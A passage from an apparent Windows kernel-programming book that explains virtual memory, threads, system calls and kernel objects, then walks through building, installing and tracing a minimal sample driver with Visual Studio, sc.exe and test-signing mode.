that bit set (which would happen for addresses larger than 2 GB) is not an issue.
Chapter 1: Windows Internals Overview
6
Each process has its own address space, which makes any process address relative, rather than absolute.
For example, when trying to determine what lies in address 0x20000, the address itself is not enough; the
process to which this address relates to must be specified.
The memory itself is called virtual, which means there is an indirect relationship between an address
and the exact location where it’s found in physical memory (RAM). A buffer within a process may be
mapped to physical memory, or it may temporarily reside in a file (such as a page file). The term virtual
refers to the fact that from an execution perspective, there is no need to know if the memory about to be
accessed is in RAM or not; if the memory is indeed mapped to RAM, the CPU will perform the virtual-
to-physical translation before accessing the data. if the memory is not resident (specified by a flag in the
translation table entry), the CPU will raise a page fault exception that causes the memory manager’s page
fault handler to fetch the data from the appropriate file (if indeed it’s a valid page fault), copy it to RAM,
make the required changes in the page table entries that map the buffer, and instruct the CPU to try again.
Figure 1-3 shows this conceptual mapping from virtual to physical memory for two processes.
Figure 1-3: virtual memory mapping
The unit of memory management is called a page. Every attribute related to memory is always at a
page’s granularity, such as its protection or state. The size of a page is determined by CPU type (and on
some processors, may be configurable), and in any case, the memory manager must follow suit. Normal
(sometimes called small) page size is 4 KB on all Windows-supported architectures.
Apart from the normal (small) page size, Windows also supports large pages. The size of a large page is 2
MB (x86/x64/ARM64) or 4 MB (ARM). This is based on using the Page Directory Entry (PDE) to map the
large page without using a page table. This results in quicker translation, but most importantly better use
of the Translation Lookaside Buffer (TLB) – a cache of recently translated pages maintained by the CPU.
Chapter 1: Windows Internals Overview
7
In the case of a large page, a single TLB entry maps significantly more memory than a small page.
The downside of large pages is the need to have the memory contiguous in RAM, which can
fail if memory is tight or very fragmented. Also, large pages are always non-pageable and can
only use read/write protection.
Huge pages
of 1 GB in size are supported on Windows 10 and Server 2016 and later. These are used automatically with
large pages if an allocation is at least 1 GB in size, and that size can be located as contiguous in RAM.
Page States
Each page in virtual memory can be in one of three states:
• Free – the page is not allocated in any way; there is nothing there. Any attempt to access that page
would cause an access violation exception. Most pages in a newly created process are free.
• Committed – the reverse of free; an allocated page that can be accessed successfully (assuming non-
conflicting protection attributes; for example, writing to a read-only page causes an access violation).
Committed pages are mapped to RAM or to a file (such as a page file).
• Reserved – the page is not committed, but the address range is reserved for possible future
commitment. From the CPU’s perspective, it’s the same as Free – any access attempt raises an
access violation exception. However, new allocation attempts using the VirtualAlloc function
(or NtAllocateVirtualMemory, the related native API) that does not specify a specific address
would not allocate in the reserved region. A classic example of using reserved memory to maintain
contiguous virtual address space while conserving committed memory usage is described later in
this chapter in the section “Thread Stacks”.
System Memory
The lower part of the address space is for user-mode processes use. While a particular thread is executing,
its associated process address space is visible from address zero to the upper limit as described in the
previous section. The operating system, however, must also reside somewhere – and that somewhere is
the upper address range that’s supported on the system, as follows:
• On 32-bit systems running without the increase user virtual address space setting, the operating sys-
tem resides in the upper 2 GB of virtual address space, from address 0x80000000 to 0xFFFFFFFF.
• On 32-bit systems configured with the increase user virtual address space setting, the operating
system resides in the address space left. For example, if the system is configured with 3 GB user
address space per process (the maximum), the OS takes the upper 1 GB (from address 0xC0000000
to 0xFFFFFFFF). The component that suffers mostly from this address space reduction is the file
system cache.
• On 64-bit systems running Windows 8, Server 2012 and earlier, the OS takes the upper 8 TB of virtual
address space.
• On 64-bit systems running Windows 8.1, Server 2012 R2 and later, the OS takes the upper 128 TB of
virtual address space.
Chapter 1: Windows Internals Overview
8
Figure 1-4 shows the virtual memory layout for the two “extreme” cases: 32-bit process on a 32-bit system
(left) and a 64-bit process on a 64-bit system (right).
Figure 1-4: virtual memory layout
System space is not process-relative – after all, it’s the same system, the same kernel, the same drivers that
service every process on the system (the exception is some system memory that is on a per-session basis
but is not important for this discussion). It follows that any address in system space is absolute rather than
relative, since it “looks” the same from every process context. Of course, actual access from user mode into
system space results in an access violation exception.
System space is where the kernel itself, the Hardware Abstraction Layer (HAL), and kernel drivers reside
once loaded. Thus, kernel drivers are automatically protected from direct user mode access. It also means
they have a potentially system-wide impact. For example, if a kernel driver leaks memory, that memory
will not be freed even after the driver unloads. User-mode processes, on the other hand, can never leak
anything beyond their lifetime. The kernel is responsible for closing and freeing everything private to a
dead process (all handles are closed and all private memory is freed).
Threads
The actual entities that execute code are threads. A Thread is contained within a process, using the
resources exposed by the process to do work (such as virtual memory and handles to kernel objects).
The most important information a thread owns is the following:
• Current access mode, either user or kernel.
• Execution context, including processor registers and execution state.
• One or two stacks, used for local variable allocations and call management.
• Thread Local Storage (TLS) array, which provides a way to store thread-private data with uniform
access semantics.
• Base priority and a current (dynamic) priority.
• Processor affinity, indicating on which processors the thread is allowed to run on.
Chapter 1: Windows Internals Overview
9
The most common states a thread can be in are:
• Running – currently executing code on a (logical) processor.
• Ready – waiting to be scheduled for execution because all relevant processors are busy or
unavailable.
• Waiting – waiting for some event to occur before proceeding. Once the event occurs, the thread
goes to the Ready state.
Figure 1-5 shows the state diagram for these states. The numbers in parenthesis indicate the state numbers,
as can be viewed by tools such as Performance Monitor. Note that the Ready state has a sibling state called
Deferred Ready, which is similar, and exists to minimize internal locking.
Figure 1-5: Common thread states
Thread Stacks
Each thread has a stack it uses while executing, used to store local variables, parameters passed to functions
(in some cases), and where return addresses are stored prior to making function calls. A thread has at least
one stack residing in system (kernel) space, and it’s pretty small (default is 12 KB on 32-bit systems and 24
KB on 64-bit systems). A user-mode thread has a second stack in its process user-space address range and
is considerably larger (by default can grow to 1 MB). An example with three user-mode threads and their
stacks is shown in figure 1-6. In the figure, threads 1 and 2 are in process A and thread 3 is in process B.
The kernel stack always resides in RAM while the thread is in the Running or Ready states. The reason
for this is subtle and will be discussed later in this chapter. The user-mode stack, on the other hand, may
be paged out, just like any other user-mode memory.
The user-mode stack is handled differently than the kernel-mode stack in terms of its size. It starts out
with a certain amount of committed memory (could be as small as a single page), where the next page is
committed with a PAGE_GUARD attribute. The rest of the stack address space memory is reserved, thus
not wasting memory. The idea is to grow the stack in case the thread’s code needs to use more stack space.
Chapter 1: Windows Internals Overview
10
If the thread needs more stack space it would access the guard page which would throw a page-guard
exception. The memory manager then removes the guard protection, and commits an additional page,
marking it with a PAGE_GUARD attribute. This way, the stack grows as needed, avoiding the entire stack
memory being committed upfront. Figure 1-7 shows this layout.
Figure 1-6: User mode threads and their stacks
Technically, Windows uses 3 guard pages rather than one in most cases.
Chapter 1: Windows Internals Overview
11
Figure 1-7: Thread’s stack in user space
The sizes of a thread’s user-mode stack are determined as follows:
• The executable image has a stack commit and reserved values in its Portable Executable (PE) header.
These are taken as defaults if a thread does not specify alternative values. These are always used for
the first thread in the process.
• When a thread is created with CreateThread (or similar functions), the caller can specify its
required stack size, either the upfront committed size or the reserved size (but not both), depending
on a flag provided to the function; specifying zero uses the defaults set in the PE header.
Curiously enough, the functions CreateThread and CreateRemoteThread(Ex) only
allow specifying a single value for the stack size and can be the committed or the reserved size,
but not both. The native (undocumented) function, NtCreateThreadEx allows specifying
both values.
System Services (a.k.a. System Calls)
Applications need to perform various operations that are not purely computational, such as allocating
memory, opening files, creating threads, etc. These operations can only be ultimately performed by code
running in kernel mode. So how would user-mode code be able to perform such operations?
Let’s take a common (simple) example: a user running a Notepad process uses the File / Open menu to
request opening a file. Notepad’s code responds by calling the CreateFile documented Windows API
function. CreateFile is documented as implemented in kernel32.Dll, one of the Windows subsystem
DLLs. This function still runs in user mode, so there is no way it can directly open a file. After some
error checking, it calls NtCreateFile, a function implemented in NTDLL.dll, a foundational DLL that
implements the API known as the Native API, and is the lowest layer of code which is still in user mode.
This function (documented in the Windows Driver Kit for device driver developers) is the one that makes
the transition to kernel mode. Before the actual transition, it puts a number, called system service number,
into a CPU register (EAX on Intel/AMD architectures). Then it issues a special CPU instruction (syscall
Chapter 1: Windows Internals Overview
12
on x64 or sysenter on x86) that makes the actual transition to kernel mode while jumping to a predefined
routine called the system service dispatcher.
The system service dispatcher, in turn, uses the value in that EAX register as an index into a System Service
Dispatch Table (SSDT). Using this table, the code jumps to the system service (system call) itself. For
our Notepad example, the SSDT entry would point to the NtCreateFile function, implemented by the
kernel’s I/O manager. Notice the function has the same name as the one in NTDLL.dll, and has the same
parameters as well. On the kernel side is the real implementation. Once the system service is complete,
the thread returns to user mode to execute the instruction following sysenter/syscall. This sequence
of calls is depicted in figure 1-8.
Figure 1-8: System service function call flow
Chapter 1: Windows Internals Overview
13
General System Architecture
Figure 1-9 shows the general architecture of Windows, comprising of user-mode and kernel-mode
components.
Figure 1-9: Windows system architecture
Here’s a quick rundown of the named boxes appearing in figure 1-9:
• User processes
These are normal processes based on image files, executing on the system, such as instances of
Notepad.exe, cmd.exe, explorer.exe, and so on.
• Subsystem DLLs
Subsystem DLLs are dynamic link libraries (DLLs) that implement the API of a subsystem. A
subsystem is a particular view of the capabilities exposed by the kernel. Technically, starting from
Windows 8.1, there is only a single subsystem – the Windows Subsystem. The subsystem DLLs
include well-known files, such as kernel32.dll, user32.dll, gdi32.dll, advapi32.dll, combase.dll, and
many others. These include mostly the officially documented API of Windows.
• NTDLL.DLL
A system-wide DLL, implementing the Windows native API. This is the lowest layer of code which
is still in user mode. Its most important role is to make the transition to kernel mode for system call
invocation. NTDLL also implements the Heap Manager, the Image Loader and some part of the user
mode thread pool.
Chapter 1: Windows Internals Overview
14
• Service Processes
Service processes are normal Windows processes that communicate with the Service Control
Manager (SCM, implemented in services.exe) and allow some control over their lifetime. The SCM
can start, stop, pause, resume and send other messages to services. Services typically execute under
one of the special Windows accounts – local system, network service or local service.
• Executive
The Executive is the upper layer of NtOskrnl.exe (the “kernel”). It hosts most of the code that is
in kernel mode. It includes mostly the various “managers”: Object Manager, Memory Manager, I/O
Manager, Plug & Play Manager, Power Manager, Configuration Manager, etc. It’s by far larger than
the lower Kernel layer.
• Kernel
The Kernel layer implements the most fundamental and time-sensitive parts of kernel-mode OS
code. This includes thread scheduling, interrupt and exception dispatching, and implementation of
various kernel primitives such as mutexes and semaphores. Some of the kernel code is written in
CPU-specific machine language for efficiency and for getting direct access to CPU-specific details.
• Device Drivers
Device drivers are loadable kernel modules. Their code executes in kernel mode and so has the full
power of the kernel. This book is dedicated to writing certain types of kernel drivers.
• Win32k.sys
This is the kernel-mode component of the Windows subsystem. Essentially, it’s a kernel module
(driver) that handles the user interface part of Windows and the classic Graphics Device Inter-
face (GDI) APIs. This means that all windowing operations (CreateWindowEx, GetMessage,
PostMessage, etc.) are handled by this component. The rest of the system has little-to-none
knowledge of UI.
• Hardware Abstraction Layer (HAL)
The HAL is a software abstraction layer over the hardware closest to the CPU. It allows device
drivers to use APIs that do not require detailed and specific knowledge of things like Interrupt
Controllers or DMA controller. Naturally, this layer is mostly useful for device drivers written to
handle hardware devices.
• System Processes
System processes is an umbrella term used to describe processes that are typically “just there”, doing
their thing where normally these processes are not communicated with directly. They are important
nonetheless, and some in fact, critical to the system’s well-being. Terminating some of them is fatal
and causes a system crash. Some of the system processes are native processes, meaning they use
the native API only (the API implemented by NTDLL). Example system processes include Smss.exe,
Lsass.exe, Winlogon.exe, and Services.exe.
• Subsystem Process
The Windows subsystem process, running the image Csrss.exe, can be viewed as a helper to the
kernel for managing processes running under the Windows subsystem. It is a critical process,
meaning if killed, the system would crash. There is one Csrss.exe instance per session, so on a
standard system two instances would exist – one for session 0 and one for the logged-on user session
(typically 1). Although Csrss.exe is the “manager” of the Windows subsystem (the only one left these
days), its importance goes beyond just this role.
Chapter 1: Windows Internals Overview
15
• Hyper-V Hypervisor
The Hyper-V hypervisor exists on Windows 10 and server 2016 (and later) systems if they support
Virtualization Based Security (VBS). VBS provides an extra layer of security, where the normal OS is
a virtual machine controlled by Hyper-V. Two distinct Virtual Trust Levels (VTLs) are defined, where
VTL 0 consists of the normal user-mode/kernel-mode we know of, and VTL 1 contains the secure
kernel and Isolated User Mode (IUM). VBS is beyond the scope of this book. For more information,
check out the Windows Internals book and/or the Microsoft documentation.
Windows 10 version 1607 introduced the Windows Subsystem for Linux (WSL). Although this
may look like yet another subsystem, like the old POSIX and OS/2 subsystems supported by
Windows, it is not like that at all. The old subsystems were able to execute POSIX and OS/2 apps
if these were compiled using a Windows compiler to use the PE format and Windows system
calls. WSL, on the other hand, has no such requirement. Existing executables from Linux (stored
in ELF format) can be run as-is on Windows, without any recompilation.
To make something like this work, a new process type was created – the Pico process together
with a Pico provider. Briefly, a Pico process is an empty address space (minimal process) that is
used for WSL processes, where every system call (Linux system call) must be intercepted and
translated to the Windows system call(s) equivalent using that Pico provider (a device driver).
There is a true Linux (the user-mode part) installed on the Windows machine.
The above description is for WSL version 1. Starting with Windows 10 version 2004, Windows
supports a new version of WSL known as WSL 2. WSL 2 is not based on pico processes anymore.
Instead, it’s based on a hybrid virtual machine technology that allows installing a full Linux
system (including the Linux kernel), but still see and share the Windows machine’s resources,
such as the file system. WSL 2 is faster than WSL 1 and solves some edge cases that didn’t work
well in WSL 1, thanks to the real Linux kernel handling Linux system calls.
Handles and Objects
The Windows kernel exposes various types of objects for use by user-mode processes, the kernel itself and
kernel-mode drivers. Instances of these types are data structures in system space, created by the Object
Manager (part of the executive) when requested to do so by user-mode or kernel-mode code. Objects are
reference counted – only when the last reference to the object is released will the object be destroyed and
freed from memory.
Since these object instances reside in system space, they cannot be accessed directly by user mode. User
mode must use an indirect access mechanism, known as handles. A handle is an index to an entry in a table
maintained on a process by process basis, stored in kernel space, that points to a kernel object residing in
system space. There are various Create* and Open* functions to create/open objects and retrieve back
handles to these objects. For example, the CreateMutex user-mode function allows creating or opening a
mutex (depending on whether the object is named and exists). If successful, the function returns a handle
to the object. A return value of zero means an invalid handle (and a function call failure). The OpenMutex
function, on the other hand, tries to open a handle to a named mutex. If the mutex with that name does
not exist, the function fails and returns null (0).
Chapter 1: Windows Internals Overview
16
Kernel (and driver) code can use either a handle or a direct pointer to an object. The choice is usually
based on the API the code wants to call. In some cases, a handle given by user mode to the driver must be
turned into a pointer with the ObReferenceObjectByHandle function. We’ll discuss these details in a
later chapter.
Most functions return null (zero) on failure, but some do not. Most notably, the CreateFile
function returns INVALID_HANDLE_VALUE (-1) if it fails.
Handle values are multiples of 4, where the first valid handle is 4; Zero is never a valid handle value.
Kernel-mode code can use handles when creating/opening objects, but they can also use direct pointers
to kernel objects. This is typically done when a certain API demands it. Kernel code can get a pointer
to an object given a valid handle using the ObReferenceObjectByHandle function. If successful,
the reference count on the object is incremented, so there is no danger that if the user-mode client
holding the handle decided to close it while kernel code holds a pointer to the object would now hold
a dangling pointer. The object is safe to access regardless of the handle-holder until the kernel code calls
ObDerefenceObject, which decrements the reference count; if the kernel code missed this call, that’s
a resource leak which will only be resolved in the next system boot.
All objects are reference counted. The object manager maintains a handle count and total reference count
for objects. Once an object is no longer needed, its client should close the handle (if a handle was used to
access the object) or dereference the object (if kernel client using a pointer). From that point on, the code
should consider its handle/pointer to be invalid. The Object Manager will destroy the object if its reference
count reaches zero.
Each object points to an object type, which holds information on the type itself, meaning there is a single
type object for each type of object. These are also exposed as exported global kernel variables, some of
which are defined in the kernel headers and are needed in certain cases, as we’ll see in later chapters.
Object Names
Some types of objects can have names. These names can be used to open objects by name with a suitable
Open function. Note that not all objects have names; for example, processes and threads don’t have names
– they have IDs. That’s why the OpenProcess and OpenThread functions require a process/thread
identifier (a number) rather than a string-base name. Another somewhat weird case of an object that does
not have a name is a file. The file name is not the object’s name – these are different concepts.
Threads appear to have a name (starting from Windows 10), that can be set with the user-
mode API SetThreadDescription. This is not, however, a true name, but rather a friendly
name/description most useful in debugging, as Visual Studio shows a thread’s description, if
there is any.
Chapter 1: Windows Internals Overview
17
From user-mode code, calling a Create function with a name creates the object with that name if an object
with that name does not exist, but if it exists it just opens the existing object. In the latter case, calling
GetLastError returns ERROR_ALREADY_EXISTS, indicating this is not a new object, and the returned
handle is yet another handle to an existing object.
The name provided to a Create function is not actually the final name of the object. It’s prepended with
\Sessions\x\BaseNamedObjects\ where x is the session ID of the caller. If the session is zero, the name is
prepended with \BaseNamedObjects\. If the caller happens to be running in an AppContainer (typically
a Universal Windows Platform process), then the prepended string is more complex and consists of the
unique AppContainer SID: \Sessions\x\AppContainerNamedObjects\{AppContainerSID}.
All the above means is that object names are session-relative (and in the case of AppContainer – package
relative). If an object must be shared across sessions it can be created in session 0 by prepending
the object name with Global\; for example, creating a mutex with the CreateMutex function named
Global\MyMutex will create it under \BaseNamedObjects. Note that AppContainers do not have the power
to use session 0 object namespace.
This hierarchy can be viewed with the Sysinternals WinObj tool (run elevated) as shown in figure 1-10.
Figure 1-10: Sysinternals WinObj tool
The view shown in figure 1-9 is the object manager namespace, comprising of a hierarchy of named objects.
This entire structure is held in memory and manipulated by the Object Manager (part of the Executive)
Chapter 1: Windows Internals Overview
18
as required. Note that unnamed objects are not part of this structure, meaning the objects seen in WinObj
do not comprise all the existing objects, but rather all the objects that were created with a name.
Every process has a private handle table to kernel objects (whether named or not), which can be viewed
with the Process Explorer and/or Handles Sysinternals tools. A screenshot of Process Explorer showing
handles in some process is shown in figure 1-11. The default columns shown in the handles view are the
object type and name only. However, there are other columns available, as shown in figure 1-11.
Figure 1-11: Viewing handles in processes with Process Explorer
By default, Process Explorer shows only handles for objects, which have names (according to Process
Explorer’s definition of a name, discussed shortly). To view all handles in a process, select Show Unnamed
Handles and Mappings from Process Explorer’s View menu.
The various columns in the handle view provide more information for each handle. The handle value and
the object type are self explanatory. The name column is tricky. It shows true object names for Mutexes
(Mutants), Semaphores, Events, Sections, ALPC Ports, Jobs, Timers, Directory (object manager Directories,
not file system directories), and other, less used object types. Yet others are shown with a name that has a
different meaning than a true named object:
• Process and Thread objects, the name is shown as their unique ID.
• For File objects, it shows the file name (or device name) pointed to by the file object. It’s not the
same as an object’s name, as there is no way to get a handle to a file object given the file name -
only a new file object may be created that accesses the same underlying file or device (assuming
sharing settings for the original file object allow it).
• (Registry) Key objects names are shown with the path to the registry key. This is not a name, for
the same reasoning as for file objects.
• Token object names are shown with the user name stored in the token.
Chapter 1: Windows Internals Overview
19
Accessing Existing Objects
The Access column in Process Explorer’s handles view shows the access mask which was used to open or
create the handle. This access mask is key to what operations are allowed to be performed with a specific
handle. For example, if client code wants to terminate a process, it must call the OpenProcess function
first, to obtain a handle to the required process with an access mask of (at least) PROCESS_TERMINATE,
otherwise there is no way to terminate the process with that handle. If the call succeeds, then the call to
TerminateProcess is bound to succeed.
Here’s a user-mode example for terminating a process given a process ID:
bool KillProcess(DWORD pid) {
//
// open a powerful-enough handle to the process
//
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
if (!hProcess)
return false;
//
// now kill it with some arbitrary exit code
//
BOOL success = TerminateProcess(hProcess, 1);
//
// close the handle
//
CloseHandle(hProcess);
return success != FALSE;
}
The Decoded Access column provides a textual description of the access mask (for some object types),
making it easier to identify the exact access allowed for a particular handle.
Double-clicking a handle entry (or right-clicking and selecting Properties) shows some of the object’s
properties. Figure 1-12 shows a screenshot of an example event object properties.
Chapter 1: Windows Internals Overview
20
Figure 1-12: Object properties in Process Explorer
Notice that the dialog shown in figure 1-12 is for the object’s properties, rather than the handle’s. In other
words, looking at an object’s properties from any handle that points to the same object shows the same
information.
The properties in figure 1-12 include the object’s name (if any), its type, a short description, its address
in kernel memory, the number of open handles, and some specific object information, such as the state
and type of the event object shown. Note that the References shown do not indicate the actual number
Chapter 1: Windows Internals Overview
21
of outstanding references to the object (it does prior to Windows 8.1). A proper way to see the actual
reference count for the object is to use the kernel debugger’s !trueref command, as shown here:
lkd> !object 0xFFFFA08F948AC0B0
Object: ffffa08f948ac0b0
Type: (ffffa08f684df140) Event
ObjectHeader: ffffa08f948ac080 (new version)
HandleCount: 2
PointerCount: 65535
Directory Object: ffff90839b63a700
Name: ShellDesktopSwitchEvent
lkd> !trueref ffffa08f948ac0b0
ffffa08f948ac0b0: HandleCount: 2 PointerCount: 65535 RealPointerCount: 3
We’ll take a closer look at the attributes of objects and the kernel debugger in later chapters.
In the next chapter, we’ll start writing a very simple driver to show and use many of the tools we’ll need
later in this book.
Chapter 2: Getting Started with Kernel
Development
This chapter deals with the fundamentals needed to get up and running with kernel driver development.
During the course of this chapter, you’ll install the necessary tools and write a very basic driver that can
be loaded and unloaded.
In this chapter:
• Installing the Tools
• Creating a Driver Project
• The DriverEntry and Unload routines
• Deploying the Driver
• Simple Tracing
Installing the Tools
In the old days (pre-2012), the process of developing and building drivers included using a dedicated build
tool from the Device Driver Kit (DDK), without having an integrated development experience developers
were used to when developing user-mode applications. There were some workarounds, but none of them
was perfect nor officially supported by Microsoft.
Fortunately, starting with Visual Studio 2012 and Windows Driver Kit 8, Microsoft officially supports
building drivers with Visual Studio (with msbuild), without the need to use a separate compiler and build
tools.
To get started with driver development, the following tools must be installed (in this order) on your
development machine:
• Visual Studio 2019 with the latest updates. Make sure the C++ workload is selected during
installation. Note that any SKU will do, including the free Community edition.
• Windows 11 SDK (generally, the latest is recommended). Make sure at least the Debugging Tools for
Windows item is selected during installation.
• Windows 11 Driver Kit (WDK) - it supports building drivers for Windows 7 and later versions of
Windows. Make sure the wizard installs the project templates for Visual Studio at the end of the
installation.
Chapter 2: Getting Started with Kernel Development
23
• The Sysinternals tools, which are invaluable in any “internals” work, can be downloaded for free
from http://www.sysinternals.com. Click on Sysinternals Suite on the left of that web page and
download the Sysinternals Suite zip file. Unzip to any folder, and the tools are ready to go.
The SDK and WDK versions must match. Follow the guidelines in the WDK download page to
load the corresponding SDK with the WDK.
A quick way to make sure the WDK templates are installed correctly is to open Visual Studio
and select New Project and look for driver projects, such as “Empty WDM Driver”.
Creating a Driver Project
With the above installations in place, a new driver project can be created. The template you’ll use in this
section is “WDM Empty Driver”. Figure 2-1 shows what the New Project dialog looks like for this type
of driver in Visual Studio 2019. Figure 2-2 shows the same initial wizard with Visual Studio 2019 if the
Classic Project Dialog extension is installed and enabled. The project in both figures is named “Sample”.
Figure 2-1: New WDM Driver Project in Visual Studio 2019
Chapter 2: Getting Started with Kernel Development
24
Figure 2-2: New WDM Driver Project in Visual Studio 2019 with the Classic Project Dialog extension
Once the project is created, the Solution Explorer shows a single file within the Driver Files filter -
Sample.inf. You won’t need this file in this example, so simply delete it (right-click and select Remove
or press the Del key).
Now it’s time to add a source file. Right-click the Source Files node in Solution Explorer and select Add /
New Item… from the File menu. Select a C++ source file and name it Sample.cpp. Click OK to create it.
The DriverEntry and Unload Routines
Every driver has an entry point called DriverEntry by default. This can be considered the “main”
function of the driver, comparable to the classic main of a user-mode application. This function is called
by a system thread at IRQL PASSIVE_LEVEL (0). (IRQLs are discussed in detail in chapter 8.)
DriverEntry has a predefined prototype, shown here:
NTSTATUS
DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath\
);
The _In_ annotations are part of the Source (Code) Annotation Language (SAL). These annotations are
transparent to the compiler, but provide metadata useful for human readers and static analysis tools. I may
Chapter 2: Getting Started with Kernel Development
25
remove these annotations in code samples to make it easier to read, but you should use SAL annotations
whenever possible.
A minimal DriverEntry routine could just return a successful status, like so:
NTSTATUS
DriverEntry(
_In_ PDRIVER_OBJECT DriverObject,
_In_ PUNICODE_STRING RegistryPath) {
return STATUS_SUCCESS;
}
This code would not yet compile. First, you’ll need to include a header that has the required definitions
for the types present in DriverEntry. Here’s one possibility:
#include <ntddk.h>
Now the code has a better chance of compiling, but would still fail. One reason is that by default, the
compiler is set to treat warnings as errors, and the function does not make use of its given arguments.
Removing treat warnings as errors from the compiler’s options is not recommended, as some warnings
may be errors in disguise. These warnings can be resolved by removing the argument names entirely (or
commenting them out), which is fine for C++ files. There is another, more “classic” way to solve this, which
is to use the UNREFERENCED_PARAMETER macro:
NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
return STATUS_SUCCESS;
}
As it turns out, this macro actually references the argument given just by writing its value as is, and this
shuts the compiler up, making the argument technically “referenced”.
Building the project now compiles fine, but causes a linker error. The DriverEntry function must have
C-linkage, which is not the default in C++ compilation. Here’s the final version of a successful build of the
driver consisting of a DriverEntry function only:
Chapter 2: Getting Started with Kernel Development
26
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
return STATUS_SUCCESS;
}
At some point, the driver may be unloaded. At that time, anything done in the DriverEntry function
must be undone. Failure to do so creates a leak, which the kernel will not clean up until the next reboot.
Drivers can have an Unload routine that is automatically called before the driver is unloaded from memory.
Its pointer must be set using the DriverUnload member of the driver object:
DriverObject->DriverUnload = SampleUnload;
The unload routine accepts the driver object (the same one passed to DriverEntry) and returns void.
As our sample driver has done nothing in terms of resource allocation in DriverEntry, there is nothing
to do in the Unload routine, so we can leave it empty for now:
void SampleUnload(_In_ PDRIVER_OBJECT DriverObject) {
UNREFERENCED_PARAMETER(DriverObject);
}
Here is the complete driver source at this point:
#include <ntddk.h>
void SampleUnload(_In_ PDRIVER_OBJECT DriverObject) {
UNREFERENCED_PARAMETER(DriverObject);
}
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
DriverObject->DriverUnload = SampleUnload;
return STATUS_SUCCESS;
}
Deploying the Driver
Now that we have a successfully compiled Sample.sys driver file, let’s install it on a system and then load
it. Normally, you would install and load a driver on a virtual machine, to remove the risk of crashing your
primary machine. Feel free to do so, or take the slight risk with this minimalist driver.
Chapter 2: Getting Started with Kernel Development
27
Installing a software driver, just like installing a user-mode service, requires calling the CreateService
API with proper arguments, or using a comparable tool. One of the well-known tools for this purpose
is Sc.exe (short for Service Control), a built-in Windows tool for managing services. We’ll use this tool
to install and then load the driver. Note that installation and loading of drivers is a privileged operation,
normally available for administrators.
Open an elevated command window and type the following (the last part should be the path on your
system where the SYS file resides):
sc create sample type= kernel binPath= c:\dev\sample\x64\debug\sample.sys
Note there is no space between type and the equal sign, and there is a space between the equal sign and
kernel; same goes for the second part.
If all goes well, the output should indicate success. To test the installation, you can open the registry editor
(regedit.exe) and look for the driver details at HKLM\System\CurrentControlSet\Services\Sample. Figure
2-3 shows a screenshot of the registry editor after the previous command.
Figure 2-3: Registry for an installed driver
To load the driver, we can use the Sc.exe tool again, this time with the start option, which uses the
StartService API to load the driver (the same API used to load services). However, on 64 bit systems
drivers must be signed, and so normally the following command would fail:
sc start sample
Chapter 2: Getting Started with Kernel Development
28
Since it’s inconvenient to sign a driver during development (maybe even not possible if you don’t have
a proper certificate), a better option is to put the system into test signing mode. In this mode, unsigned
drivers can be loaded without a hitch.
With an elevated command window, test signing can be turned on like so:
bcdedit /set testsigning on
Unfortunately, this command requires a reboot to take effect. Once rebooted, the previous start command
should succeed.
If you are testing on a Windows 10 (or later) system with Secure Boot enabled, changing the
test signing mode will fail. This is one of the settings protected by Secure Boot (local kernel
debugging is also protected by Secure Boot). If you can’t disable Secure Boot through BIOS
setting, because of IT policy or some other reason, your best option is to test on a virtual
machine.
There is yet another setting that you may need to specify if you intend to test the driver on pre-Windows
10 machine. In this case, you have to set the target OS version in the project properties dialog, as shown
in figure 2-4. Notice that I have selected all configurations and all platforms, so that when switching
configurations (Debug/Release) or platforms (x86/x64/ARM/ARM64), the setting is maintained.
Figure 2-4: Setting Target OS Platform in the project properties
Chapter 2: Getting Started with Kernel Development
29
Once test signing mode is on, and the driver is loaded, this is the output you should see:
c:/>sc start sample
SERVICE_NAME: sample
TYPE
: 1
KERNEL_DRIVER
STATE
: 4
RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE
: 0
(0x0)
SERVICE_EXIT_CODE
: 0
(0x0)
CHECKPOINT
: 0x0
WAIT_HINT
: 0x0
PID
: 0
FLAGS
:
This means everything is well, and the driver is loaded. To confirm, we can open Process Explorer and
find the Sample.Sys driver image file. Figure 2-5 shows the details of the sample driver image loaded into
system space.
Figure 2-5: sample driver image loaded into system space
At this point, we can unload the driver using the following command:
sc stop sample
Behind the scenes, sc.exe calls the ControlService API with the SERVICE_CONTROL_STOP value.
Unloading the driver causes the Unload routine to be called, which at this time does nothing. You can
verify the driver is indeed unloaded by looking at Process Explorer again; the driver image entry should
not be there anymore.
Simple Tracing
How can we know for sure that the DriverEntry and Unload routines actually executed? Let’s add basic
tracing to these functions. Drivers can use the DbgPrint function to output printf-style text that can
Chapter 2: Getting Started with Kernel Development
30
be viewed using the kernel debugger, or some other tool.
Here is updated versions for DriverEntry and the Unload routine that use KdPrint to trace the fact
their code executed:
void SampleUnload(PDRIVER_OBJECT DriverObject) {
UNREFERENCED_PARAMETER(DriverObject);
DbgPrint("Sample driver Unload called\n");
}
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
DriverObject->DriverUnload = SampleUnload;
DbgPrint("Sample driver initialized successfully\n");
return STATUS_SUCCESS;
}
A more typical approach is to have these outputs in Debug builds only. This is because Dbgprint has
some overhead that you may want to avoid in Release builds. KdPrint is a macro that is only compiled in
Debug builds and calls the underlying DbgPrint kernel API. Here is a revised version that uses KdPrint:
void SampleUnload(PDRIVER_OBJECT DriverObject) {
UNREFERENCED_PARAMETER(DriverObject);
KdPrint(("Sample driver Unload called\n"));
}
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
DriverObject->DriverUnload = SampleUnload;
KdPrint(("Sample driver initialized successfully\n"));
return STATUS_SUCCESS;
}
